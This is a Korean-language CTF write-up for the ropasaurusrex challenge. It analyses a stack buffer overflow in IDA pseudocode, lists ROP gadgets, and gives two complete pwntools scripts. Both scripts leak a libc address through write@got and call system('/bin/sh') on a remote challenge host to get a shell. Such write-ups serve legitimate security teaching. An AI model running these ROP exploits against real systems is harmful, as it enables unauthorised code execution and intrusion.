문제
IDA 디컴파일
#main함수
// IDA pseudocode of main(): calls the helper that performs the unchecked read,
// then prints "WIN\n" to stdout. Nothing here validates what the helper read.
ssize_t __cdecl main()
{
sub_80483F4();
return write(1, "WIN\n", 4u);
#sub_80483F4 함수
// IDA pseudocode of the vulnerable helper: reads up to 0x100 bytes from stdin into a
// stack buffer that IDA places at [ebp-88h], i.e. only 0x88 bytes below the saved ebp.
// No length check: anything past 0x88 bytes overwrites saved ebp and the return address
// (classic stack overflow; NX forces a ROP chain rather than injected code).
ssize_t sub_80483F4()
{
char buf; // [esp+10h] [ebp-88h]
return read(0, &buf, 0x100u);
}
x86 문제로..
sub_80483F4 함수에서의 read는 입력을 0x100 만큼 입력받지만 buf의 크기는 0x88이므로, BOF 발생.
NX 보호기법이 걸려있으므로, 쉘코드로는 불가능합니다.
딱히 특별한 것은 없으므로, ROP를 이용하여 문제를 풀어나가겠습니다.
분석
1. BUF, SFP를 채워주고, write@plt , write@got 를 이용하여 실제 주소 leak , ret주소를 main으로,
2. libc_base를 구하고, system의 실제 주소를 얻는다.
4. read 함수를 이용해 bss영역에 /bin/sh 를 넣어준다.
5. system 호출, 인자 값 bss ( bss안에는 현재 /bin/sh 의 문자열이 들어있다) > system(/bin/sh)
6. 쉘획득
본 ropasaurusrex문제에서는 심볼(symbol)이 깨져있으므로, e.symbols['main']을 이용하지 못한다.
그래서 IDA main주소를 찾아서 그냥 했다..
main = 0x804841D
필요한 가젯.
pop ret;
: system의 인자 1개
pop pop ret;
: write의 인자 3개
명령어 : ROPgadget --binary "파일이름" | grep "pop"
user@user-virtual-machine:~/Desktop/deep pwnable/7-22$ ROPgadget --binary ropasaurusrex | grep "pop"
0x080483c1 : add al, 0x5b ; pop ebp ; ret
0x080482e2 : add al, ch ; fadd dword ptr [ecx] ; add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080482e6 : add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080484b2 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080483bf : add esp, 4 ; pop ebx ; pop ebp ; ret
0x080484e0 : clc ; push dword ptr [ebp - 0xc] ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080482e4 : fadd dword ptr [ecx] ; add byte ptr [eax], al ; pop eax ; pop ebx ; leave ; ret
0x080484b1 : fiadd word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; ret
0x080484e3 : hlt ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080484b0 : jb 0x8048490 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080484e2 : jne 0x80484d8 ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080483c0 : les eax, ptr [ebx + ebx*2] ; pop ebp ; ret
0x080484b3 : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
0x08048451 : mov ebp, esp ; pop ebp ; ret
0x0804844b : nop ; nop ; nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844c : nop ; nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844d : nop ; nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844e : nop ; nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x0804844f : nop ; push ebp ; mov ebp, esp ; pop ebp ; ret
0x080483bd : or byte ptr [ecx], al ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x080482e8 : pop eax ; pop ebx ; leave ; ret
0x080483c3 : pop ebp ; ret
0x080482e9 : pop ebx ; leave ; ret
0x080483c2 : pop ebx ; pop ebp ; ret
0x080484b5 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048504 : pop ecx ; pop ebx ; leave ; ret
0x080484b7 : pop edi ; pop ebp ; ret
0x080484b6 : pop esi ; pop edi ; pop ebp ; ret
0x080484e1 : push dword ptr [ebp - 0xc] ; add esp, 4 ; pop ebx ; pop ebp ; ret
0x08048450 : push ebp ; mov ebp, esp ; pop ebp ; ret
0x080484b4 : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret
1번 풀이.
> read함수를 이용하여 bss영역에 /bin/sh 를 넣은 후 system을 호출.
2번 풀이.
> libc_Base를 이용해 /bin/sh 의 문자열을 찾은 후 system을 호출
Exploit code ( BSS 영역에 /bin/sh 넣기)
from pwn import *
context.log_level = 'debug'
p = remote('sunrin.site', 9005)
e = ELF('./ropasaurusrex')
# pwntools' guess at the libc the local binary links against. The symbol offsets used
# below are only valid if the remote libc is the same build — NOTE(review): confirm.
libc = e.libc
# The binary's symbols are broken (see write-up text), so main's address comes from IDA.
main = 0x804841D
write_plt = e.plt['write']
write_got = e.got['write']
read_plt = e.plt['read']
read_got = e.got['read']  # unused in this script
binsh = '/bin/sh\x00'
# Gadgets from the ROPgadget listing: 0x080484b6 = "pop esi ; pop edi ; pop ebp ; ret"
# (discards three call arguments), 0x080483c3 = "pop ebp ; ret" (discards one).
# The name "prdi" is misleading: that gadget pops ebp, not edi.
pppr = 0x080484b6
prdi = 0x080483c3
# Stage 1: buf sits 0x88 bytes below the saved ebp, so 0x88 + 4 filler bytes reach the
# return address. Chain: write(1, write_got, 8) -> pppr -> main, i.e. print the resolved
# pointer stored in write@got, then re-enter main so read() runs a second time.
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(8)
payload += p32(main)
# NOTE(review): str + p32() concatenation is Python 2 pwntools behaviour; on Python 3
# p32() returns bytes and mixing it with 'a' * n raises TypeError.
p.sendline(payload)
# Takes the 4 bytes ending at the first 0xf7 byte as the leaked pointer. This assumes the
# leaked address's most significant byte is 0xf7 and that no earlier 0xf7 byte appears
# in the output — fragile; nothing in the code checks either assumption.
leak = u32(p.recvuntil('\xf7')[-4:])
log.info(hex(leak))
# libc base = leaked write address - write's offset within libc.
libc_base = leak - libc.symbols['write']
log.info(hex(libc_base))
system = libc_base + libc.symbols['system']
log.info(hex(system))
# Stage 2 (main re-ran, read() is waiting again): read(0, bss+0x200, 8) stores the next
# 8 input bytes in .bss, pppr discards the three arguments, then system(bss+0x200).
# prdi occupies system's return-address slot; the dword after it is system's argument.
payload2 = 'a' * (0x88 + 0x4)
payload2 += p32(read_plt)
payload2 += p32(pppr)
payload2 += p32(0)
payload2 += p32(e.bss()+ 0x200)
payload2 += p32(8)
payload2 += p32(system)
payload2 += p32(prdi)
payload2 += p32(e.bss()+0x200)
p.send(payload2)
# The 8-byte string consumed by the read() call in the chain above.
p.send(binsh)
p.interactive()
Exploit code ( /bin/sh 문자열 검색 )
from pwn import *
context.log_level = 'debug'
p = remote('sunrin.site', 9005)
e = ELF('./ropasaurusrex')
# pwntools' guess at the libc the local binary links against. The symbol offsets and the
# '/bin/sh' search below are only valid if the remote libc is the same build — NOTE(review): confirm.
libc = e.libc
#main = e.sym['main']
# The binary's symbols are broken (see write-up text), so main's address comes from IDA.
main = 0x804841D
write_plt = e.plt['write']
write_got = e.got['write']
# Gadgets from the ROPgadget listing: 0x080484b6 = "pop esi ; pop edi ; pop ebp ; ret"
# (discards three call arguments), 0x080483c3 = "pop ebp ; ret" (discards one).
# The name "prdi" is misleading: that gadget pops ebp, not edi.
pppr = 0x080484b6
prdi = 0x080483c3
# Stage 1: buf sits 0x88 bytes below the saved ebp, so 0x88 + 4 filler bytes reach the
# return address. Chain: write(1, write_got, 8) -> pppr -> main, i.e. print the resolved
# pointer stored in write@got, then re-enter main so read() runs a second time.
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(8)
payload += p32(main)
# NOTE(review): str + p32() concatenation is Python 2 pwntools behaviour; on Python 3
# p32() returns bytes and mixing it with 'a' * n raises TypeError.
p.sendline(payload)
# First 4 of the 8 bytes written by the chain = the 32-bit write@got entry.
leak = u32(p.recv(4))
log.info(hex(leak))
# libc base = leaked write address - write's offset within libc.
libc_base = leak - libc.symbols['write']
log.info(hex(libc_base))
system = libc_base + libc.symbols['system']
log.info(hex(system))
# First occurrence of '/bin/sh' in the local libc image, rebased to the remote mapping.
binsh = libc_base + list(libc.search('/bin/sh'))[0]
log.info(hex(binsh))
# Stage 2 (main re-ran, read() is waiting again): system(binsh). prdi occupies system's
# return-address slot; the dword after it is system's single argument.
payload2 = 'a' * (0x88 + 0x4)
payload2 += p32(system)
payload2 += p32(prdi)
payload2 += p32(binsh)
p.sendline(payload2)
p.interactive()
FLAG